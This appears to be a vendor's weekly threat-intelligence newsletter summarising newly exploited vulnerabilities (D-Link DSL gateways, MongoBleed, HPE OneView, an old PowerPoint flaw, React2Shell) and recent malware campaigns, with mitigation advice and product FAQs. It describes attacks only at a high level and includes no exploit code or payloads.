Active Exploits Across Legacy and Modern Stacks

This week two vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, including a flaw in Hewlett Packard Enterprise OneView and a legacy vulnerability in Microsoft Office PowerPoint, highlighting how even long-patched flaws continue to resurface due to active exploitation risk. Apart from this, active exploitation was detected targeting legacy D-Link DSL gateway products, reinforcing the persistent danger posed by end-of-life infrastructure that remains exposed on the internet.

In parallel, threat intelligence observed renewed exploitation of the React2Shell vulnerability by the RondoDoX botnet, demonstrating rapid attacker adaptation to modern web frameworks. Notable threat activity throughout the week underscored a broader trend: threat actors are increasingly blending vulnerability exploitation with evolving tools, trusted platforms, and social engineering techniques to accelerate compromise, expand reach, and bypass traditional defenses—setting an aggressive tone for the threat landscape at the start of the year.

Key points:

• 2 vulnerabilities added to the CISA KEV catalog.
• Active exploitation detected in D-Link DSL Gateway devices.
• Cytellite sensor telemetry detected exploit scanning activity targeting globally exposed assets.  
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
• Viber leveraged as an initial access vector.
• "System fix” lures deliver DCRat malware.
• Malicious AI Browser Extensions impact over 9 lakh installations.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2026-0625 - Command Injection vulnerability in D-Link DSL gateway devices

A Command Injection vulnerability affecting legacy D-Link DSL gateway routers, including DSL-526B, DSL-2640B, DSL-2740R, and DSL-2780B was identified in the dnscfg.cgi endpoint due to improper sanitization of user-supplied DNS parameters. According to VulnCheck, the flaw enables unauthenticated remote code execution and is linked to DNSChanger-style unauthenticated DNS modification, a technique historically abused at scale. Active exploitation was observed in the wild, following detection of a live attack on a honeypot operated by The Shadowserver Foundation, using a previously undocumented technique. D-Link has confirmed these devices reached end of life more than five years ago and will not receive patches; as mitigation, affected systems should be immediately decommissioned or isolated from the internet and replaced with supported hardware to prevent continued compromise.  

CVE-2025-14847 - Improper Handling of Length Parameter Inconsistency Vulnerability in MongoDB and MongoDB Server

An Improper Handling of Length Parameter Inconsistency vulnerability in MongoDB and MongoDB Server, code named as MongoBleed, allowed unauthenticated attackers to remotely leak sensitive data from server memory by abusing flaws in the zlib-based message compression and decompression logic. By sending specially crafted compressed network packets, attackers could trigger the server to return uninitialized heap memory, exposing credentials, API keys, cached queries, and other sensitive artifacts without requiring authentication or user interaction. Because zlib compression is enabled by default, the issue impacted a wide range of MongoDB versions across cloud and on-premises deployments, with more than 87,000 potentially vulnerable instances identified globally. The flaw posed heightened risk to internet-exposed databases due to its pre-authentication reachability and low exploitation complexity. MongoDB addressed the issue in updated releases, and the vulnerability was added to the CISA KEV catalog, confirming active exploitation in the wild.

CVE-2025-37164 - Code Injection vulnerability in Hewlett Packard Enterprise OneView

A Code Injection vulnerability in the Hewlett Packard Enterprise OneView allows a remote unauthenticated attacker to achieve remote code execution, posing a severe risk to affected environments. This flaw impacts all OneView versions prior to 11.0.0, with hotfixes available for versions 5.20 through 10, as disclosed by the vendor. A detailed proof-of-concept was published by Rapid7 in December 2025, increasing the likelihood of exploitation. Reflecting its severity and real-world risk, the vulnerability was added to the CISA KEV catalog this week, prompting an urgent recommendation for organizations to apply updates or hotfixes immediately to mitigate potential compromise.  

CVE-2009-0556  - Code Injection vulnerability in Microsoft Office PowerPoint

A Code Injection vulnerability in the Microsoft Office PowerPoint, allows attackers to execute arbitrary code by exploiting memory corruption triggered by an invalid index value in the OutlineTextRefAtom structure of a specially crafted PowerPoint file. Successful exploitation enables full system compromise in the context of the logged-in user and historically required user interaction to open the malicious file, commonly delivered via email or malicious websites. Although the vulnerability was publicly disclosed and patched by Microsoft in 2009 and previously exploited in limited, targeted campaigns attributed to Chinese APT actors, it has now been added to the CISA KEV catalog, underscoring its continued relevance and exploitation risk.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

‍

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

CVE-2025-55182

According to CloudSEK, a newly observed wave of RondoDox activity reveals a sustained, nine-month exploitation campaign leveraging exposed command-and-control logs to automate attacks against vulnerable web applications and IoT devices. The group rapidly adapted to emerging attack trends by weaponizing the React-based Next.js Server Actions vulnerability - CVE-2025-55182 to achieve remote code execution at scale, making it a dominant attack vector by December 2025.  

Between Dec 8 and 16, RondoDox conducted large-scale scanning to identify susceptible servers using blind RCE techniques, validating exploitation through commands such as echo VULN, whoami, and arithmetic tests with output exfiltration via redirects. From December 13 onward, exploitation surged to hourly attack levels, indicating a shift from reconnaissance to active compromise, driven by the vulnerability’s prevalence in modern web stacks and its effectiveness in enabling rapid payload deployment beyond traditional botnet, web shell, and cryptomining use cases.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

An overview of recently observed campaigns and tactics that reflect how threat actors are adapting tools, platforms, and social engineering methods.

• The Russia-aligned threat actor UAC-0184 (also tracked as Hive0156) has been observed targeting Ukrainian military and government entities by abusing Viber as an initial intrusion vector to deliver malicious ZIP archives. Known for war-themed phishing lures that deploy Hijack Loader as a precursor to Remcos RAT infections, the group has steadily expanded beyond email. Recent campaigns show a tactical shift toward Signal and Telegram, signaling an evolution toward multi-platform messaging abuse for malware delivery.  
• Researchers have uncovered a new campaign dubbed PHALT#BLYX that abuses ClickFix-style lures presenting fake blue screen of death (BSoD) fixes to compromise organizations in the European hospitality sector. Detected in late December 2025, the multi-stage operation ultimately delivers DCRat (aka DarkCrystal RAT), an off-the-shelf RAT and a variant of AsyncRAT. The campaign highlights how social-engineering-driven "fix" prompts continue to be an effective vector for stealthy remote access malware deployment.
• Cybersecurity researchers have identified two malicious extensions on the Chrome Web Store that covertly exfiltrate conversations from ChatGPT and DeepSeek, along with users’ browsing data, to attacker-controlled servers. The extensions - “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” and “AI Sidebar with Deepseek, ChatGPT, Claude, and more” - have collectively amassed over 900,000 installs, amplifying their potential impact. The findings underscore the growing abuse of AI-branded browser add-ons as a stealthy vector for large-scale data theft.

Recent developments reinforce a clear reality - old and new vulnerabilities alike remain actively weaponized, especially across unsupported infrastructure and modern web stacks. The resurgence of legacy flaws, alongside rapid exploitation of emerging technologies, highlights how quickly attackers adapt their playbooks.  Loginsoft Vulnerability Intelligence (LOVI) helps organizations stay ahead of this curve by correlating real-world exploitation, KEV additions, and emerging attacker tactics into actionable intelligence. By leveraging LOVI, security teams can prioritize remediation, reduce exposure windows, and proactively defend against an increasingly fast-moving threat landscape.

FAQs:

1) What is React2Shell and why is it appealing for threat actors?

A) React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.

2) How does LOVI help organizations manage vulnerabilities effectively?

A) Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.

3) What is MongoDB?

A) MongoDB is a widely used NoSQL database that stores data in flexible BSON (Binary JSON) documents instead of fixed tables. It is designed to handle large volumes of structured and unstructured data with high performance. MongoDB is commonly deployed across cloud and on-premises environments to support scalable, highly available, and distributed applications.

4) What is Cytellite?

A) Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.